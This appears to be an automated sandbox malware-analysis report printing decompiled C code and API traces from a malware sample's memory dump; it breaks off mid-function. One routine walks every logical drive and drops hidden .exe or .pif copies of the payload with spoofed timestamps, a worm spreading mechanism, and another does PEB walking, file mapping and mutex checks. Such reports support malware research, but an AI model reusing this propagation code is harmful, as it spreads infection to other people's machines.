                                0x0220b6ea
                                0x0220b6ea
                                0x0220b6ee
                                0x0220b6f1
                                0x0220b6fb
                                0x0220b6fc
                                0x0220b706
                                0x0220b70d
                                0x0220b712
                                0x0220b713
                                0x0220b71a
                                0x0220b71d
                                0x0220b738
                                0x0220b73c
                                0x0220b73e
                                0x0220b74b
                                0x0220b752
                                0x0220b752
                                0x0220b755
                                0x0220b755
                                0x0220b71f
                                0x0220b71f
                                0x0220b726
                                0x0220b733
                                0x0220b733
                                0x0220b71d
                                0x0220b758
                                0x0220b75c
                                0x0220b7db
                                0x0220b7df
                                0x0220b85e
                                0x0220b862
                                0x0220b879
                                0x0220b87d
                                0x00000000
                                0x00000000
                                0x0220b883
                                0x0220b887
                                0x0220b88e
                                0x0220b89b
                                0x0220b8a5
                                0x0220b8a8
                                0x0220b8d4
                                0x0220b8d4
                                0x0220b8dc
                                0x0220b8de
                                0x00000000
                                0x00000000
                                0x0220b8e0
                                0x0220b8e7
                                0x00000000
                                0x00000000
                                0x0220b8b1
                                0x0220b8be
                                0x0220b8c8
                                0x0220b8ce
                                0x0220b8ce
                                0x0220b8d1
                                0x0220b8d1
                                0x0220b8eb
                                0x0220b8f3
                                0x0220b8f5
                                0x0220b8fc
                                0x0220b901
                                0x0220b904
                                0x0220b907
                                0x00000000
                                0x0220b907
                                0x0220b6c1
                                0x0220b6d0
                                0x0220b6dd
                                0x0220b6e2
                                0x0220b6ea
                                0x0220b6ea
                                0x0220b6ee
                                0x0220b6f1
                                0x0220b6fb
                                0x0220b6fc
                                0x0220b706
                                0x0220b70d
                                0x0220b712
                                0x0220b713
                                0x0220b71a
                                0x0220b71d
                                0x0220b738
                                0x0220b73c
                                0x0220b73e
                                0x0220b74b
                                0x0220b752
                                0x0220b752
                                0x0220b755
                                0x0220b755
                                0x0220b71f
                                0x0220b71f
                                0x0220b726
                                0x0220b733
                                0x0220b733
                                0x0220b71d
                                0x00000000
                                0x0220b706
                                0x0220b6c1
                                0x00000000
                                0x0220b889
                                0x0220b867
                                0x0220b86a
                                0x0220b86d
                                0x00000000
                                0x0220b86d
                                0x0220b7e1
                                0x0220b7e5
                                0x0220b815
                                0x0220b819
                                0x0220b849
                                0x0220b853
                                0x0220b853
                                0x0220b856
                                0x0220b81b
                                0x0220b821
                                0x0220b823
                                0x0220b837
                                0x0220b841
                                0x0220b841
                                0x0220b844
                                0x0220b825
                                0x0220b825
                                0x0220b82f
                                0x0220b832
                                0x0220b832
                                0x0220b847
                                0x0220b7e7
                                0x0220b7ed
                                0x0220b7ef
                                0x0220b803
                                0x0220b80d
                                0x0220b80d
                                0x0220b810
                                0x0220b7f1
                                0x0220b7f1
                                0x0220b7fb
                                0x0220b7fe
                                0x0220b7fe
                                0x0220b813
                                0x0220b75e
                                0x0220b762
                                0x0220b792
                                0x0220b796
                                0x0220b7c6
                                0x0220b7d0
                                0x0220b7d0
                                0x0220b7d3
                                0x0220b798
                                0x0220b79e
                                0x0220b7a0
                                0x0220b7b4
                                0x0220b7be
                                0x0220b7be
                                0x0220b7c1
                                0x0220b7a2
                                0x0220b7a2
                                0x0220b7af
                                0x0220b7af
                                0x0220b7c4
                                0x0220b764
                                0x0220b76c
                                0x0220b780
                                0x0220b78a
                                0x0220b78a
                                0x0220b78d
                                0x0220b76e
                                0x0220b76e
                                0x0220b77b
                                0x0220b77b
                                0x0220b790
                                0x0220b7d6
                                0x00000000
                                0x0220b75c
                                0x0220b6c1

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CountExchangeInterlockedTick
                                • String ID: x$z${
                                • API String ID: 3499635708-1334427886
                                • Opcode ID: 1915ea0fc2dd8202595a9948b22521ba5df3303d4e42e7f7223441e7591744cb
                                • Instruction ID: 08d1f1c62fce36ee737e8e9a3f1b6f38c86f7477087188bd6a078ee38715cbc8
                                • Opcode Fuzzy Hash: 1915ea0fc2dd8202595a9948b22521ba5df3303d4e42e7f7223441e7591744cb
                                • Instruction Fuzzy Hash: BE624FB1D2010ADFCB14DFD8C9C5AAE77B2FF88308F248219E515A7289D734AA51CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E02216CD0(char* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
                                				signed int _v8;
                                				unsigned int _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v24;
                                				signed int _v28;
                                				intOrPtr _v32;
                                
                                				if(_a16 % 4 == 0) {
                                					if(_a16 >= 1) {
                                						_v24 = 0;
                                						_v32 = _a12;
                                						while(_a16 > 0) {
                                							if(0 != 0) {
                                								L8:
                                								return 0x403;
                                							}
                                							_v8 = 0;
                                							if((_v8 & 0x00000080) == 0) {
                                								_v32 = _v32 + 1;
                                								if(0 != 0) {
                                									L11:
                                									return 0x403;
                                								}
                                								_v12 = 0;
                                								if((_v12 & 0x00000080) == 0) {
                                									_v32 = _v32 + 1;
                                									if(0 != 0x3d) {
                                										if(0 != 0) {
                                											L18:
                                											return 0x403;
                                										}
                                										_v16 = 0;
                                										if((_v16 & 0x00000080) == 0) {
                                											_v32 = _v32 + 1;
                                											if(0 != 0x3d) {
                                												if(0 != 0) {
                                													L23:
                                													return 0x403;
                                												}
                                												_v20 = 0;
                                												if((_v20 & 0x00000080) == 0) {
                                													_v24 = _v24 + 3;
                                													L25:
                                													_v32 = _v32 + 1;
                                													_v28 = _v8 << 0x00000002 | _v12 >> 0x00000004;
                                													 *_a4 = _v28;
                                													_a4 = _a4 + 1;
                                													_v28 = _v12 << 0x00000004 | _v16 >> 0x00000002;
                                													 *_a4 = _v28;
                                													_a4 = _a4 + 1;
                                													_v28 = _v16 << 0x00000006 | _v20;
                                													 *_a4 = _v28;
                                													_a4 = _a4 + 1;
                                													_a16 = _a16 - 4;
                                													continue;
                                												}
                                												goto L23;
                                											}
                                											_v20 = 0;
                                											_v24 = _v24 + 2;
                                											goto L25;
                                										}
                                										goto L18;
                                									}
                                									_v20 = 0;
                                									_v16 = _v20;
                                									_v24 = _v24 + 1;
                                									_v32 = _v32 + 1;
                                									if(0 == 0x3d) {
                                										goto L25;
                                									}
                                									return 0x403;
                                								}
                                								goto L11;
                                							}
                                							goto L8;
                                						}
                                						 *_a8 = _v24;
                                						return 0;
                                					}
                                					 *_a8 = 0;
                                					return 0;
                                				}
                                				return 0x403;
                                			}










                                0x02216ce4
                                0x02216cf4
                                0x02216d06
                                0x02216d10
                                0x02216d13
                                0x02216d2c
                                0x02216d4c
                                0x00000000
                                0x02216d4c
                                0x02216d3d
                                0x02216d4a
                                0x02216d5c
                                0x02216d6d
                                0x02216d8e
                                0x00000000
                                0x02216d8e
                                0x02216d7e
                                0x02216d8c
                                0x02216d9e
                                0x02216dab
                                0x02216df6
                                0x02216e16
                                0x00000000
                                0x02216e16
                                0x02216e07
                                0x02216e14
                                0x02216e26
                                0x02216e33
                                0x02216e55
                                0x02216e76
                                0x00000000
                                0x02216e76
                                0x02216e66
                                0x02216e74
                                0x02216e86
                                0x02216e89
                                0x02216e8f
                                0x02216ea0
                                0x02216ea9
                                0x02216eb1
                                0x02216ec2
                                0x02216ecb
                                0x02216ed3
                                0x02216edf
                                0x02216ee8
                                0x02216ef0
                                0x02216ef9
                                0x00000000
                                0x02216ef9
                                0x00000000
                                0x02216e74
                                0x02216e35
                                0x02216e42
                                0x00000000
                                0x02216e42
                                0x00000000
                                0x02216e14
                                0x02216dad
                                0x02216db7
                                0x02216dc0
                                0x02216dc9
                                0x02216dd6
                                0x00000000
                                0x02216de2
                                0x00000000
                                0x02216dd8
                                0x00000000
                                0x02216d8c
                                0x00000000
                                0x02216d4a
                                0x02216f07
                                0x00000000
                                0x02216f09
                                0x02216cf9
                                0x00000000
                                0x02216cff
                                0x00000000

                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ccb03749b737a8d60da42bb55e1ab1d50fbaeb0fe104dff745c7bd14d2fbe6f5
                                • Instruction ID: 03ed510165a5ba376f8a803e17a93f366ba256c4fdc46cf439aa38868dd1fbd5
                                • Opcode Fuzzy Hash: ccb03749b737a8d60da42bb55e1ab1d50fbaeb0fe104dff745c7bd14d2fbe6f5
                                • Instruction Fuzzy Hash: 34712B70E1414A8BDB08CFA9C490BBFBBF6EF99304F18C169D956AB345D7359902CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E02213062(void* __ecx, void* __eflags) {
                                				struct _OVERLAPPED* _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				struct _OVERLAPPED* _v32;
                                				void _v4127;
                                				char _v4128;
                                				void* _v4132;
                                				long _v4136;
                                				char _v4393;
                                				char _v4394;
                                				void _v4395;
                                				char _v4396;
                                				struct _FILETIME _v4404;
                                				struct _FILETIME _v4412;
                                				long _v4416;
                                				struct _SYSTEMTIME _v4432;
                                				char _v4689;
                                				char _v4690;
                                				void _v4691;
                                				char _v4692;
                                				long _v4696;
                                				struct _OVERLAPPED* _v4700;
                                				signed int _v4704;
                                				long _v4708;
                                				struct _FILETIME _v4716;
                                				void* _v4720;
                                				long _v4724;
                                				signed int _t169;
                                				long _t174;
                                				signed int _t197;
                                				int _t226;
                                				void* _t236;
                                				struct _OVERLAPPED* _t237;
                                				long _t240;
                                				long _t245;
                                				void* _t269;
                                				long _t272;
                                				intOrPtr _t291;
                                				long _t304;
                                				intOrPtr _t311;
                                				long _t342;
                                				intOrPtr _t353;
                                				intOrPtr _t354;
                                				void* _t358;
                                				void* _t359;
                                
                                				_push(0xffffffff);
                                				_push(0x2204038);
                                				_push(0x2218090);
                                				 *[fs:0x0] = _t353;
                                				_t354 = _t353 - 8;
                                				E02218060(0x1258, __ecx,  *[fs:0x0]);
                                				_v28 = _t354;
                                				_v4724 = 0;
                                				_v4704 = 0;
                                				_v4696 = 0;
                                				_v4708 = 0;
                                				_v4416 = 0;
                                				_v4396 = 0;
                                				memset( &_v4395, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v4692 = 0;
                                				memset( &_v4691, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v4128 = 0;
                                				memset( &_v4127, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v32 = 0;
                                				_v4700 = 0;
                                				_v4136 = 0;
                                				_v4132 = 0;
                                				_v4432.wYear = 0;
                                				_v4432.wMonth = 0;
                                				_v4432.wDay = 0;
                                				_v4432.wMinute = 0;
                                				_v4432.wMilliseconds = 0;
                                				_v8 = 0;
                                				_t169 = E022044CB(0);
                                				asm("cdq");
                                				_t304 = (_t169 & 0x0000ffff) % 0x2710 + 0x3801;
                                				_t361 = _t304;
                                				Sleep(_t304);
                                				E02212FFF(_t304,  &_v4396);
                                				_t358 = _t354 + 0x28;
                                				while(1) {
                                					_t174 = E0220E329( &_v4396, _t361,  &_v4396, 1,  &_v4136);
                                					_t358 = _t358 + 0xc;
                                					_t361 = _t174;
                                					if(_t174 != 0) {
                                						break;
                                					}
                                					Sleep(0x4e20);
                                				}
                                				__eflags = _v4136 - 0x1000;
                                				if(_v4136 <= 0x1000) {
                                					L46:
                                					_v8 = 0xffffffff;
                                					_push(0);
                                					RtlExitUserThread();
                                					__eflags = 0;
                                					 *[fs:0x0] = _v20;
                                					return 0;
                                				}
                                				__eflags = _v4136 - 0x200000;
                                				if(_v4136 >= 0x200000) {
                                					goto L46;
                                				}
                                				__eflags =  *_v4132 - 0x4d;
                                				if( *_v4132 != 0x4d) {
                                					goto L46;
                                				}
                                				_t269 = _v4132;
                                				__eflags =  *((char*)(_t269 + 1)) - 0x5a;
                                				if( *((char*)(_t269 + 1)) != 0x5a) {
                                					goto L46;
                                				} else {
                                					goto L7;
                                				}
                                				while(1) {
                                					L7:
                                					__eflags = 1;
                                					if(1 == 0) {
                                						goto L46;
                                					}
                                					E02212EBC();
                                					Sleep(0x4e20);
                                					_v4696 = 0;
                                					_v4696 = GetLogicalDrives();
                                					_v4704 = 2;
                                					while(1) {
                                						__eflags = _v4704 - 0x1a;
                                						if(_v4704 >= 0x1a) {
                                							break;
                                						}
                                						_v4724 = _v4696 >> _v4704 & 0x00000001;
                                						__eflags = _v4724 - 1;
                                						if(_v4724 != 1) {
                                							L44:
                                							L9:
                                							_t272 = _v4704 + 1;
                                							__eflags = _t272;
                                							_v4704 = _t272;
                                							continue;
                                						}
                                						_v4692 = _v4704 + 0x41;
                                						_v4691 = 0x3a;
                                						_v4690 = 0x5c;
                                						_v4689 = 0;
                                						_v4724 = GetDriveTypeA( &_v4692);
                                						__eflags = _v4724 - 5;
                                						if(_v4724 == 5) {
                                							goto L44;
                                						}
                                						_t311 =  *0x21e1830; // 0x2202740
                                						 *0x21e106c( &_v4692, _t311);
                                						_v4720 = CreateFileA( &_v4692, 0x80000000, 1, 0, 3, 0x20, 0);
                                						__eflags = _v4720 - 0xffffffff;
                                						if(_v4720 == 0xffffffff) {
                                							L36:
                                							_v4416 = GetFileAttributesA( &_v4692);
                                							__eflags = _v4416 - 0xffffffff;
                                							if(_v4416 != 0xffffffff) {
                                								SetFileAttributesA( &_v4692, 0x20);
                                								DeleteFileA( &_v4692);
                                								E0220A2AD( &_v4692);
                                								_t358 = _t358 + 4;
                                							}
                                							_v4720 = CreateFileA( &_v4692, 0x40000000, 2, 0, "true", 0x20, 0);
                                							__eflags = _v4720 - 0xffffffff;
                                							if(__eflags != 0) {
                                								GetSystemTime( &_v4432);
                                								_v4432.wSecond = (_v4432.wHour & 0x0000ffff) + 7;
                                								SystemTimeToFileTime( &_v4432,  &_v4404);
                                								_v4396 = _v4692;
                                								_v4395 = _v4691;
                                								_v4394 = _v4690;
                                								_v4393 = 0;
                                								E0220A16B(_v4691, __eflags,  &_v4393);
                                								_t359 = _t358 + 4;
                                								_t197 = E022044CB(_v4691);
                                								asm("cdq");
                                								__eflags = (_t197 & 0x0000ffff) % 0x61 - 0x32;
                                								if(__eflags <= 0) {
                                									 *0x21e106c( &_v4396, ".exe");
                                								} else {
                                									 *0x21e106c( &_v4396, ".pif");
                                								}
                                								E02212B8E(__eflags,  &_v4128,  &_v4393);
                                								_t358 = _t359 + 8;
                                								WriteFile(_v4720,  &_v4128,  *0x21e114c(0),  &_v4128,  &_v4724);
                                								SetFileTime(_v4720,  &_v4404,  &_v4412,  &_v4716);
                                								CloseHandle(_v4720);
                                								SetFileAttributesA( &_v4692, 7);
                                								_v4720 = CreateFileA( &_v4396, 0x40000000, 2, 0, "true", 0x20, 0);
                                								__eflags = _v4720 - 0xffffffff;
                                								if(_v4720 != 0xffffffff) {
                                									WriteFile(_v4720, _v4132, _v4136,  &_v4724, 0);
                                									CloseHandle(_v4720);
                                									SetFileAttributesA( &_v4396, 7);
                                								}
                                							}
                                							goto L44;
                                						}
                                						GetFileTime(_v4720,  &_v4404,  &_v4412,  &_v4716);
                                						_t226 = FileTimeToSystemTime( &_v4404,  &_v4432);
                                						__eflags = _t226;
                                						if(_t226 == 0) {
                                							L35:
                                							CloseHandle(_v4720);
                                							goto L36;
                                						}
                                						__eflags = (_v4432.wSecond & 0x0000ffff) - (_v4432.wHour & 0x0000ffff) + 7;
                                						if((_v4432.wSecond & 0x0000ffff) != (_v4432.wHour & 0x0000ffff) + 7) {
                                							goto L35;
                                						}
                                						E02204060( &_v4128, 0, 0x1000);
                                						_t358 = _t358 + 0xc;
                                						ReadFile(_v4720,  &_v4128, 0xfa0,  &_v4708, 0);
                                						CharLowerA( &_v4128);
                                						_t236 =  *0x21e114c( &_v4128);
                                						__eflags = _t236 - 0x40;
                                						if(_t236 <= 0x40) {
                                							L34:
                                							goto L9;
                                						}
                                						_t291 =  *0x21e1720; // 0x22024a4
                                						_t237 = E02208DEB( &_v4128, _t291);
                                						_t358 = _t358 + 8;
                                						_v32 = _t237;
                                						__eflags = _v32;
                                						if(_v32 == 0) {
                                							goto L34;
                                						}
                                						while(1) {
                                							__eflags = _v32->Internal;
                                							if(_v32->Internal == 0) {
                                								goto L34;
                                							}
                                							__eflags = _v32->Internal - 0x3d;
                                							if(_v32->Internal != 0x3d) {
                                								_t240 =  &(_v32->Internal);
                                								__eflags = _t240;
                                								_v32 = _t240;
                                								continue;
                                							}
                                							_v32 =  &(_v32->Internal);
                                							__eflags = _v32->Internal - 0x20;
                                							if(_v32->Internal == 0x20) {
                                								_t342 =  &(_v32->Internal);
                                								__eflags = _t342;
                                								_v32 = _t342;
                                							}
                                							_v4700 = _v32;
                                							while(1) {
                                								__eflags = _v4700->Internal - 0xd;
                                								if(_v4700->Internal == 0xd) {
                                									break;
                                								}
                                								__eflags = _v4700->Internal - 0xa;
                                								if(_v4700->Internal == 0xa) {
                                									break;
                                								}
                                								__eflags = _v4700->Internal;
                                								if(_v4700->Internal == 0) {
                                									break;
                                								}
                                								_v4700 =  &(_v4700->Internal);
                                							}
                                							 *_v4700 = 0;
                                							 *0x21e1148( &_v4689, _v32);
                                							_t245 = GetFileAttributesA( &_v4692);
                                							__eflags = _t245 - 0xffffffff;
                                							if(_t245 == 0xffffffff) {
                                								CloseHandle(_v4720);
                                								_v4720 = CreateFileA( &_v4692, 0x40000000, 2, 0, "true", 0x20, 0);
                                								__eflags = _v4720 - 0xffffffff;
                                								if(_v4720 != 0xffffffff) {
                                									WriteFile(_v4720, _v4132, _v4136,  &_v4724, 0);
                                									CloseHandle(_v4720);
                                									SetFileAttributesA( &_v4396, 7);
                                								}
                                							}
                                							goto L34;
                                						}
                                						goto L34;
                                					}
                                					Sleep(0x1b58);
                                				}
                                				goto L46;
                                			}
















































                                0x02213065
                                0x02213067
                                0x0221306c
                                0x02213078
                                0x0221307f
                                0x02213087
                                0x0221308f
                                0x02213092
                                0x0221309c
                                0x022130a6
                                0x022130b0
                                0x022130ba
                                0x022130c4
                                0x022130d8
                                0x022130da
                                0x022130dc
                                0x022130dd
                                0x022130f1
                                0x022130f3
                                0x022130f5
                                0x022130f6
                                0x0221310a
                                0x0221310c
                                0x0221310e
                                0x0221310f
                                0x02213116
                                0x02213120
                                0x0221312c
                                0x02213132
                                0x0221313d
                                0x02213143
                                0x02213149
                                0x0221314f
                                0x02213156
                                0x0221315d
                                0x02213167
                                0x0221316f
                                0x0221316f
                                0x02213176
                                0x02213183
                                0x02213188
                                0x0221318b
                                0x0221319b
                                0x022131a0
                                0x022131a3
                                0x022131a5
                                0x00000000
                                0x00000000
                                0x022131ac
                                0x022131ac
                                0x022131b4
                                0x022131be
                                0x02213744
                                0x02213744
                                0x0221375d
                                0x0221375f
                                0x02213765
                                0x0221376a
                                0x02213777
                                0x02213777
                                0x022131c4
                                0x022131ce
                                0x00000000
                                0x00000000
                                0x022131dd
                                0x022131e0
                                0x00000000
                                0x00000000
                                0x022131e6
                                0x022131f0
                                0x022131f3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022131f9
                                0x022131f9
                                0x022131fe
                                0x02213200
                                0x00000000
                                0x00000000
                                0x02213206
                                0x02213210
                                0x02213216
                                0x02213226
                                0x0221322c
                                0x02213247
                                0x02213247
                                0x0221324e
                                0x00000000
                                0x00000000
                                0x02213265
                                0x0221326b
                                0x02213272
                                0x0221372f
                                0x02213238
                                0x0221323e
                                0x0221323e
                                0x02213241
                                0x00000000
                                0x02213241
                                0x02213281
                                0x02213287
                                0x0221328e
                                0x02213295
                                0x022132a9
                                0x022132af
                                0x022132b6
                                0x00000000
                                0x00000000
                                0x022132bc
                                0x022132ca
                                0x022132ec
                                0x022132f2
                                0x022132f9
                                0x02213522
                                0x0221352f
                                0x02213535
                                0x0221353c
                                0x02213547
                                0x02213554
                                0x02213561
                                0x02213566
                                0x02213566
                                0x02213585
                                0x0221358b
                                0x02213592
                                0x0221359f
                                0x022135b3
                                0x022135c8
                                0x022135d4
                                0x022135e0
                                0x022135ec
                                0x022135f2
                                0x02213600
                                0x02213605
                                0x02213608
                                0x02213612
                                0x0221361a
                                0x0221361d
                                0x0221363f
                                0x0221361f
                                0x0221362b
                                0x0221362b
                                0x02213653
                                0x02213658
                                0x02213680
                                0x022136a2
                                0x022136af
                                0x022136be
                                0x022136e0
                                0x022136e6
                                0x022136ed
                                0x0221370d
                                0x0221371a
                                0x02213729
                                0x02213729
                                0x022136ed
                                0x00000000
                                0x02213592
                                0x0221331b
                                0x0221332f
                                0x02213335
                                0x02213337
                                0x02213515
                                0x0221351c
                                0x00000000
                                0x0221351c
                                0x02213357
                                0x02213359
                                0x00000000
                                0x00000000
                                0x0221336d
                                0x02213372
                                0x02213391
                                0x0221339e
                                0x022133ab
                                0x022133b1
                                0x022133b4
                                0x02213510
                                0x00000000
                                0x02213510
                                0x022133ba
                                0x022133c8
                                0x022133cd
                                0x022133d0
                                0x022133d3
                                0x022133d7
                                0x00000000
                                0x00000000
                                0x022133e8
                                0x022133ee
                                0x022133f0
                                0x00000000
                                0x00000000
                                0x022133fc
                                0x022133ff
                                0x022133e2
                                0x022133e2
                                0x022133e5
                                0x00000000
                                0x022133e5
                                0x0221340b
                                0x02213414
                                0x02213417
                                0x0221341c
                                0x0221341c
                                0x0221341f
                                0x0221341f
                                0x02213425
                                0x0221342b
                                0x02213434
                                0x02213437
                                0x00000000
                                0x00000000
                                0x02213442
                                0x02213445
                                0x00000000
                                0x00000000
                                0x02213450
                                0x02213452
                                0x00000000
                                0x00000000
                                0x0221345d
                                0x0221345d
                                0x0221346b
                                0x02213479
                                0x02213486
                                0x0221348c
                                0x0221348f
                                0x02213498
                                0x022134ba
                                0x022134c0
                                0x022134c7
                                0x022134e7
                                0x022134f4
                                0x02213503
                                0x02213503
                                0x022134c7
                                0x00000000
                                0x02213509
                                0x00000000
                                0x022133e8
                                0x02213739
                                0x02213739
                                0x00000000

                                APIs
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • Sleep.KERNEL32 ref: 02213176
                                  • Part of subcall function 02212FFF: CreateFileA.KERNELBASE(0221382E,40000000,00000002,00000000,?,00000020,00000000,?,0221382E), ref: 0221302B
                                  • Part of subcall function 02212FFF: WriteFile.KERNELBASE(000000FF,021E26B0,00000401,00000000,00000000), ref: 0221304E
                                  • Part of subcall function 02212FFF: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 02213058
                                • Sleep.KERNEL32(00004E20), ref: 022131AC
                                • Sleep.KERNEL32(00004E20), ref: 02213210
                                • GetLogicalDrives.KERNEL32 ref: 02213220
                                • GetDriveTypeA.KERNEL32(?), ref: 022132A3
                                • lstrcat.KERNEL32(?,02202740), ref: 022132CA
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 022132E6
                                • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0221331B
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0221332F
                                • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 02213391
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$SleepTime$Create$ChangeCloseDriveDrivesExchangeFindInterlockedLogicalNotificationReadSystemTypeWritelstrcat
                                • String ID: .exe$.pif$:$\
                                • API String ID: 1629485951-4138429844
                                • Opcode ID: 2102582b54a21cc82674f7ae8a2e7f3c81dfa16a050b15e5ce3889f04d5fd50f
                                • Instruction ID: 677b40592a2ea2302024f2bec41c053db2f06a8335e8f3d766216c5244abda6a
                                • Opcode Fuzzy Hash: 2102582b54a21cc82674f7ae8a2e7f3c81dfa16a050b15e5ce3889f04d5fd50f
                                • Instruction Fuzzy Hash: B50290B5D50258EBDF24DBA4CC88FEAB7B6AF58700F0045D9E209EA184D7749AE4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E0228D765() {
                                				void* _t57;
                                				void* _t66;
                                				struct HINSTANCE__* _t77;
                                				_Unknown_base(*)()* _t78;
                                				void* _t83;
                                				intOrPtr _t95;
                                				short* _t98;
                                				void* _t112;
                                				void* _t115;
                                				void* _t118;
                                				intOrPtr _t119;
                                				void* _t120;
                                
                                				_pop(_t118);
                                				_t57 = _t118;
                                				_t119 = _t118 - 0x401005;
                                				_t1 = _t119 + 0x402773; // 0x12c00
                                				if( *_t1 == 0) {
                                					 *((intOrPtr*)(_t119 + 0x40144d)) = 0x766857d0;
                                					 *((intOrPtr*)(_t119 + 0x40143a)) = 0x76684ee0;
                                					L11:
                                					_t19 = _t119 + 0x401682; // 0x228dde2
                                					 *((intOrPtr*)(_t119 + 0x401422)) = E0228D9C0(LoadLibraryExA(_t19, 0, 0));
                                					_t22 = _t119 + 0x401451; // 0x228dbb1
                                					E0228D9C5(_t22);
                                					SetErrorMode(0x8002);
                                					_t25 = _t119 + 0x401660; // 0x228ddc0
                                					CreateFileMappingA(0xffffffffffffffff, 0, "true", 0, 0x8000, _t25);
                                					_t27 = _t119 + 0x40164c; // 0x228ddac
                                					_t66 = CreateFileMappingA(0xffffffff, 0, "true", 0, 0x15400, _t27);
                                					if(_t66 != 0) {
                                						_t83 = MapViewOfFile(_t66, 6, 0, 0, 0x15400);
                                						if(_t83 != 0) {
                                							 *(_t119 + 0x40168f) = _t83;
                                							if( *((char*)(_t119 + 0x402773)) == 1) {
                                								_t32 = _t119 + 0x401000; // 0x228d760
                                								_t115 = _t32;
                                								_t112 = _t83;
                                								if( *_t112 !=  *_t115) {
                                									memcpy(_t112, _t115, 0xe8ec);
                                								}
                                							}
                                						}
                                					}
                                					_t33 = _t119 + 0x401693; // 0x228ddf3
                                					 *((intOrPtr*)(_t119 + 0x401693)) = _t119;
                                					 *((intOrPtr*)(_t119 + 0x401496))(0, 0, _t119 + 0x4016d1,  *((intOrPtr*)(_t119 + 0x401693)), 0, _t33);
                                					L17:
                                					while( *((char*)(_t119 + 0x402773)) == 0) {
                                						 *((intOrPtr*)(_t119 + 0x401503))(0xffffffff);
                                					}
                                					 *((intOrPtr*)(_t119 + 0x401503))(0xc);
                                					if( *((intOrPtr*)(_t119 + 0x4016c9)) != 1) {
                                						goto L17;
                                					}
                                					L20:
                                					if( *((intOrPtr*)(_t119 + 0x402774)) != 1) {
                                						goto __eax;
                                					}
                                					_t43 = _t119 + 0x402778; // 0x228eed8
                                					if(GetModuleFileNameA(0, _t43, 0x1fe) == 0) {
                                						L24:
                                						Sleep(0x927c0);
                                						L25:
                                						ExitProcess(0);
                                					}
                                					 *((char*)(_t119 + 0x40277b)) = 0;
                                					_t46 = _t119 + 0x401627; // 0x228dd87
                                					_t77 = LoadLibraryExA(_t46, 0, 0);
                                					_t48 = _t119 + 0x401633; // 0x228dd93
                                					_t78 = GetProcAddress(_t77, _t48);
                                					if(_t78 == 0) {
                                						goto L24;
                                					}
                                					_t50 = _t119 + 0x402778; // 0x228eed8
                                					_t51 = _t119 + 0x401426; // 0x228db86
                                					 *_t78(0, _t51, _t50, 0, 0, 1);
                                					_t52 = _t119 + 0x401679; // 0x228ddd9
                                					_push(CreateMutexA(0, 0, _t52));
                                					if(GetLastError() != 0) {
                                						goto L25;
                                					}
                                					goto L24;
                                				}
                                				_t120 = _t120 + 0x38;
                                				 *((intOrPtr*)(_t119 + 0x401254)) = _t57 - 0x24e9c;
                                				_t95 =  *[fs:0x30];
                                				if(_t95 < 0) {
                                					_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x34)) + 0xb8));
                                					asm("clc");
                                				} else {
                                					_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0xc)) + 0x1c)))) + 8));
                                					asm("clc");
                                				}
                                				if( *_t98 == 0x5a4d) {
                                					if( *((intOrPtr*)(_t98 +  *((intOrPtr*)(_t98 + 0x3c)))) == 0x4550) {
                                						 *((intOrPtr*)(_t119 + 0x401422)) = _t98;
